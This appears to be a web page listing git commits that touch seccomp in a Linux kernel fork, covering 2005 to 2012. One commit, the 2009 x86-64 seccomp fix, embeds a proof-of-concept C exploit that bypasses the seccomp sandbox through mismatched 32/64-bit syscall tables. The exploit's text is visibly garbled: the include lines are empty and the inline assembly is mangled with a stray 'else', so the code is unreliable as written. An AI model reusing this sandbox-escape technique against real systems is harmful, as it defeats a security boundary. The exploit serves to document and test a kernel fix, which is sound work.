Doug / smarc-fsl-linux-kernel

18 Jan, 2012

1 commit

  • 85e7bac33   seccomp: audit abnormal end to a process due to seccomp ... Browse Code »

    The audit system likes to collect information about processes that end
    abnormally (SIGSEGV) as this may me useful intrusion detection information.
    This patch adds audit support to collect information when seccomp forces a
    task to exit because of misbehavior in a similar way.

    Signed-off-by: Eric Paris

    Eric Paris
     

03 Mar, 2009

1 commit

  • 5b1017404   x86-64: seccomp: fix 32/64 syscall hole ... Browse Code »

    On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
    ljmp, and then use the "syscall" instruction to make a 64-bit system
    call. A 64-bit process make a 32-bit system call with int $0x80.

    In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
    the wrong system call number table. The fix is simple: test TS_COMPAT
    instead of TIF_IA32. Here is an example exploit:

    /* test case for seccomp circumvention on x86-64

    There are two failure modes: compile with -m64 or compile with -m32.

    The -m64 case is the worst one, because it does "chmod 777 ." (could
    be any chmod call). The -m32 case demonstrates it was able to do
    stat(), which can glean information but not harm anything directly.

    A buggy kernel will let the test do something, print, and exit 1; a
    fixed kernel will make it exit with SIGKILL before it does anything.
    */

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    int
    main (int argc, char **argv)
    {
    char buf[100];
    static const char dot[] = ".";
    long ret;
    unsigned st[24];

    if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

    #ifdef __x86_64__
    assert ((uintptr_t) dot < (1UL << 32));
    asm ("int $0x80 # %0 st_uid=%u\n", st[7]);
    else
    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
    #else
    # error "not this one"
    #endif

    write (1, buf, ret);

    syscall (__NR_exit, 1);
    return 2;
    }

    Signed-off-by: Roland McGrath
    [ I don't know if anybody actually uses seccomp, but it's enabled in
    at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
    Signed-off-by: Linus Torvalds

    Roland McGrath
     

17 Jul, 2007

2 commits

  • cf99abace   make seccomp zerocost in schedule ... Browse Code »

    This follows a suggestion from Chuck Ebbert on how to make seccomp
    absolutely zerocost in schedule too. The only remaining footprint of
    seccomp is in terms of the bzImage size that becomes a few bytes (perhaps
    even a few kbytes) larger, measure it if you care in the embedded.

    Signed-off-by: Andrea Arcangeli
    Cc: Andi Kleen
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     
  • 1d9d02fee   move seccomp from /proc to a prctl ... Browse Code »

    This reduces the memory footprint and it enforces that only the current
    task can enable seccomp on itself (this is a requirement for a
    strightforward [modulo preempt ;) ] TIF_NOTSC implementation).

    Signed-off-by: Andrea Arcangeli
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Andrea Arcangeli
     

17 Apr, 2005

1 commit

  • 1da177e4c   Linux-2.6.12-rc2 ... Browse Code »

    Initial git repository build. I'm not bothering with the full history,
    even though we have it. We can create a separate "historical" git
    archive of that later if we want to, and in the meantime it's about
    3.2GB when imported into git - space that would just make the early
    git days unnecessarily complicated, when we don't have a lot of good
    infrastructure for it.

    Let it rip!

    Linus Torvalds